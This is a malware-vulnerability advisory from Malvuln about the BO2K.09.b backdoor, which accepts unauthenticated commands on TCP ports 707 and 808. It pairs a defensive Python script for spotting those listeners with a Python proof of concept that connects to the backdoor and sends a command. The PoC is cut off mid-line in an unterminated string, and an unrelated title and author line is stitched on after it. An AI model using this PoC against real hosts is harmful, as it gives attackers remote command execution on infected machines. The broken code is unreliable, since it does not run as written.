Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/90894ac48059687ea80e565f7529e53f.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.BO2K.09.b
Vulnerability: Unauthenticated Remote Command Execution
Description: Backdoor BO2K.09.b listens on TCP ports 707 and 808. Third-party adversaries who can reach the system can execute any command on the infected host using sockets, or obtain a remote shell using telnet, curl, etc.
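A defender-side check that follows from the description above, added here as an example and not part of Malvuln's advisory or PoC: it parses netstat-style listener output and reports which process owns the two TCP ports the advisory associates with this backdoor (707 and 808). The netstat sample is constructed to resemble `netstat -ano` output on Windows and is not a real capture; the port set comes from the advisory, everything else is an assumption of this example.

```python
"""Flag listeners on the TCP ports this advisory associates with
Backdoor.Win32.BO2K.09.b. Example code, not the advisory's PoC."""
import re
from typing import Dict, List

# Ports taken from the advisory text (707 and 808).
BO2K_PORTS = {707, 808}

# Constructed sample in the shape of `netstat -ano` output; not a real capture.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:707            0.0.0.0:0              LISTENING       4120
  TCP    0.0.0.0:808            0.0.0.0:0              LISTENING       4120
  TCP    127.0.0.1:49152        127.0.0.1:49153        ESTABLISHED     1356
  UDP    0.0.0.0:5355           *:*                                    1276
"""

# One netstat row: proto, local addr:port, foreign addr, optional state, pid.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+\S+\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)


def parse_listeners(text: str) -> List[Dict[str, object]]:
    """Return every TCP socket in LISTENING state as {addr, port, pid}."""
    listeners = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("proto") != "TCP" or m.group("state") != "LISTENING":
            continue
        listeners.append({
            "addr": m.group("laddr"),
            "port": int(m.group("lport")),
            "pid": int(m.group("pid")),
        })
    return listeners


def find_bo2k_listeners(text: str, ports=BO2K_PORTS) -> List[Dict[str, object]]:
    """Listeners whose local port is one of the advisory's ports."""
    return [l for l in parse_listeners(text) if l["port"] in ports]


def suspicious_pids(text: str) -> Dict[int, List[int]]:
    """Group flagged ports by owning PID so the process image can be examined."""
    by_pid: Dict[int, List[int]] = {}
    for hit in find_bo2k_listeners(text):
        by_pid.setdefault(hit["pid"], []).append(hit["port"])
    return by_pid


if __name__ == "__main__":
    for pid, ports in suspicious_pids(SAMPLE_NETSTAT).items():
        print(f"PID {pid} is listening on BO2K-associated ports {sorted(ports)}")
```

A port number alone is a weak indicator, since any service can bind 707 or 808; the PID grouping exists so the owning process image can be confirmed, for instance by comparing its MD5 against the hash given in this advisory (90894ac48059687ea80e565f7529e53f) before treating the host as infected.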
Type: PE32
MD5: 90894ac48059687ea80e565f7529e53f
Vuln ID: MVID-2021-0120
Dropped files:
Disclosure: 03/02/2021
Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=707
CMD="calc\n"

def doit():
    try:
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((MALWARE_HOST,PORT))
    except Exception as e:
        print(str(e))
    res=""
    while True:
        res = s.recv(128)
        print(res)
        if "\n" in res or "
Backdoor.Win32.BO2K.09.b Code Execution
Written by: khalil shreateh